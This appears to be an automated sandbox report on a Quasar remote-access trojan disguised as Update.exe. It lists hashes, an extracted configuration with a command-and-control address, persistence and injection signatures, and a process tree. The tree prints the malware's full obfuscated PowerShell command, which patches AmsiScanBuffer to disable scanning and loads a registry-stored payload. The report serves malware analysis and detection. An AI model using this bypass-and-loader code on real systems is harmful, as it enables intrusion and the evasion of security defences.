Analysis
-
max time kernel
145s -
max time network
146s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
21-04-2024 17:18
Behavioral task
behavioral1
Sample
Update.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Update.exe
Resource
win10v2004-20240412-en
General
-
Target
Update.exe
-
Size
409KB
-
MD5
93cd801b9e5e90edab480d3c1c135271
-
SHA1
b0c7e918ade7a47916603ebd9eb1e3b4d78062c2
-
SHA256
89996d761395b9e79589c4c7c93cc21ae2b5a00a9ba8c46abbf395954f3d0133
-
SHA512
a5e207744fcb100fb24935ecda4c4214ac4cc7aca666b589fa1c451f1ad24c5a573cfe1b8150ac5510a866bb800251aa6ebf3fd685ed7a2e5fbc482791e143ed
-
SSDEEP
6144:0rBUymyfpwzeiqv6Ef3RB17bdzjyue7zKINbuz2vcDJ8vtVQY:eBwz9/Ef3RB17FyuYKIQXDJ8vtCY
Malware Config
Extracted
quasar
3.1.5
SLAVE
147.185.221.19:33587
$Sxr-zpFqsQjJJh3miBvVnu
-
encryption_key
w1TSUMSbvOFQ9whpYTwH
-
install_name
BiosUpdX64YDPS.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-mtsha
-
subdirectory
Windows
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2452-0-0x0000000000E40000-0x0000000000EAC000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
powershell.EXEsvchost.exedescription pid process target process PID 4588 created 584 4588 powershell.EXE winlogon.exe PID 4552 created 2012 4552 svchost.exe DllHost.exe PID 4552 created 3500 4552 svchost.exe WerFault.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
BiosUpdX64YDPS.exeInstall.exepid process 3704 BiosUpdX64YDPS.exe 3124 Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 9 IoCs
Processes:
OfficeClickToRun.exeDllHost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk DllHost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm DllHost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat DllHost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.log DllHost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4588 set thread context of 4328 4588 powershell.EXE dllhost.exe -
Drops file in Windows directory 1 IoCs
Processes:
DllHost.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT DllHost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeSCHTASKS.exepid process 4432 schtasks.exe 4260 schtasks.exe 2344 SCHTASKS.exe -
Modifies data under HKEY_USERS 60 IoCs
Processes:
powershell.EXEOfficeClickToRun.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting\LastCrashSelfReportTime = "133581936463818138" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1713719984" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5EBEFE70-DFDA-4E14-92CD-1F42C9391953}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 21 Apr 2024 17:19:45 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exepid process 4588 powershell.EXE 4588 powershell.EXE 4588 powershell.EXE 4588 powershell.EXE 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe 4328 dllhost.exe -
Suspicious behavior: LoadsDriver 64 IoCs
Processes:
pid process 972 3360 852 3452 1524 2112 2248 2164 2152 2812 2468 4944 2972 2100 2976 2980 3676 2724 4116 5012 1456 3740 2900 436 4132 4960 4512 1172 3552 1904 2384 3928 2268 4748 2252 444 2172 4616 4296 3052 4260 3136 4372 4148 2272 4924 2756 3176 3636 3124 2600 4056 2156 3984 4008 4436 1340 3444 3464 3496 3424 3512 3500 3540 -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
Update.exeBiosUpdX64YDPS.exepowershell.EXEdllhost.exedescription pid process Token: SeDebugPrivilege 2452 Update.exe Token: SeDebugPrivilege 3704 BiosUpdX64YDPS.exe Token: SeDebugPrivilege 4588 powershell.EXE Token: SeDebugPrivilege 4588 powershell.EXE Token: SeDebugPrivilege 4328 dllhost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
BiosUpdX64YDPS.exepid process 3704 BiosUpdX64YDPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Update.exeBiosUpdX64YDPS.exepowershell.EXEdllhost.exelsass.exedescription pid process target process PID 2452 wrote to memory of 4260 2452 Update.exe schtasks.exe PID 2452 wrote to memory of 4260 2452 Update.exe schtasks.exe PID 2452 wrote to memory of 4260 2452 Update.exe schtasks.exe PID 2452 wrote to memory of 3704 2452 Update.exe BiosUpdX64YDPS.exe PID 2452 wrote to memory of 3704 2452 Update.exe BiosUpdX64YDPS.exe PID 2452 wrote to memory of 3704 2452 Update.exe BiosUpdX64YDPS.exe PID 2452 wrote to memory of 3124 2452 Update.exe Install.exe PID 2452 wrote to memory of 3124 2452 Update.exe Install.exe PID 2452 wrote to memory of 3124 2452 Update.exe Install.exe PID 2452 wrote to memory of 2344 2452 Update.exe SCHTASKS.exe PID 2452 wrote to memory of 2344 2452 Update.exe SCHTASKS.exe PID 2452 wrote to memory of 2344 2452 Update.exe SCHTASKS.exe PID 3704 wrote to memory of 4432 3704 BiosUpdX64YDPS.exe schtasks.exe PID 3704 wrote to memory of 4432 3704 BiosUpdX64YDPS.exe schtasks.exe PID 3704 wrote to memory of 4432 3704 BiosUpdX64YDPS.exe schtasks.exe PID 4588 wrote to memory of 4328 4588 powershell.EXE dllhost.exe PID 4588 wrote to memory of 4328 4588 powershell.EXE dllhost.exe PID 4588 wrote to memory of 4328 4588 powershell.EXE dllhost.exe PID 4588 wrote to memory of 4328 4588 powershell.EXE dllhost.exe PID 4588 wrote to memory of 4328 4588 powershell.EXE dllhost.exe PID 4588 wrote to memory of 4328 4588 powershell.EXE dllhost.exe PID 4588 wrote to memory of 4328 4588 powershell.EXE dllhost.exe PID 4588 wrote to memory of 4328 4588 powershell.EXE dllhost.exe PID 4328 wrote to memory of 584 4328 dllhost.exe winlogon.exe PID 4328 wrote to memory of 640 4328 dllhost.exe lsass.exe PID 640 wrote to memory of 2744 640 lsass.exe sysmon.exe PID 640 wrote to memory of 2744 640 lsass.exe sysmon.exe PID 4328 wrote to memory of 740 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 904 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 992 4328 dllhost.exe dwm.exe PID 640 wrote to memory of 2744 640 lsass.exe sysmon.exe PID 4328 wrote to memory of 368 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 372 4328 dllhost.exe svchost.exe PID 640 wrote to memory of 2744 640 lsass.exe sysmon.exe PID 640 wrote to memory of 2744 640 lsass.exe sysmon.exe PID 4328 wrote to memory of 592 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1096 4328 dllhost.exe svchost.exe PID 640 wrote to memory of 2744 640 lsass.exe sysmon.exe PID 4328 wrote to memory of 1108 4328 dllhost.exe svchost.exe PID 640 wrote to memory of 2744 640 lsass.exe sysmon.exe PID 4328 wrote to memory of 1184 4328 dllhost.exe svchost.exe PID 640 wrote to memory of 2744 640 lsass.exe sysmon.exe PID 4328 wrote to memory of 1216 4328 dllhost.exe svchost.exe PID 640 wrote to memory of 2744 640 lsass.exe sysmon.exe PID 4328 wrote to memory of 1236 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1252 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1396 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1428 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1472 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1540 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1580 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1600 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1680 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1720 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1756 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1772 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1848 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1856 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 1940 4328 dllhost.exe spoolsv.exe PID 4328 wrote to memory of 1992 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 2144 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 2236 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 2472 4328 dllhost.exe svchost.exe PID 4328 wrote to memory of 2492 4328 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{bb273626-295c-4e4e-8bbe-91d9139f01df}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AhJxZWUIZAdN{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZZKyMIrGwCvnoY,[Parameter(Position=1)][Type]$vjBpDaCQay)$adICBwDuISy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+''+'l'+''+'e'+'ct'+[Char](101)+''+'d'+'D'+'e'+'l'+[Char](101)+'g'+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'d'+'u'+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'De'+[Char](108)+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+'p'+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+'ss,P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+'e'+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+'la'+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$adICBwDuISy.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+'ec'+'i'+'al'+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'S'+'i'+''+'g'+''+','+''+[Char](80)+'u'+'b'+'li'+'c'+'',[Reflection.CallingConventions]::Standard,$ZZKyMIrGwCvnoY).SetImplementationFlags('Run'+'t'+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$adICBwDuISy.DefineMethod('I'+'n'+'v'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'N'+'e'+''+[Char](119)+'Sl'+[Char](111)+''+'t'+''+','+'Vir'+[Char](116)+''+'u'+''+[Char](97)+'l',$vjBpDaCQay,$ZZKyMIrGwCvnoY).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+'im'+'e'+',M'+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $adICBwDuISy.CreateType();}$kwtNgqYrnikWc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+'r'+[Char](111)+''+'s'+'o'+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+'eMet'+[Char](104)+''+[Char](111)+''+'d'+'s');$beXfVhIkqxbkYQ=$kwtNgqYrnikWc.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+'S'+''+'t'+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MejXkWppwGpJgAKPKQL=AhJxZWUIZAdN @([String])([IntPtr]);$HatMvqJZiwVUNuGAGMoOBt=AhJxZWUIZAdN @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$CbDmOKLfqQf=$kwtNgqYrnikWc.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+[Char](72)+'an'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+'el3'+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$tfnyVAgwojfycY=$beXfVhIkqxbkYQ.Invoke($Null,@([Object]$CbDmOKLfqQf,[Object](''+[Char](76)+'o'+'a'+''+'d'+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+'ary'+'A'+'')));$kyAAehVuXrSpUZzJA=$beXfVhIkqxbkYQ.Invoke($Null,@([Object]$CbDmOKLfqQf,[Object](''+'V'+''+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$KOBUUrA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tfnyVAgwojfycY,$MejXkWppwGpJgAKPKQL).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$JLwvahADLawqFFCWI=$beXfVhIkqxbkYQ.Invoke($Null,@([Object]$KOBUUrA,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+'a'+'n'+''+[Char](66)+''+[Char](117)+'f'+'f'+''+[Char](101)+''+[Char](114)+'')));$yujjdgZZbs=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kyAAehVuXrSpUZzJA,$HatMvqJZiwVUNuGAGMoOBt).Invoke($JLwvahADLawqFFCWI,[uint32]8,4,[ref]$yujjdgZZbs);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JLwvahADLawqFFCWI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kyAAehVuXrSpUZzJA,$HatMvqJZiwVUNuGAGMoOBt).Invoke($JLwvahADLawqFFCWI,[uint32]8,0x20,[ref]$yujjdgZZbs);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
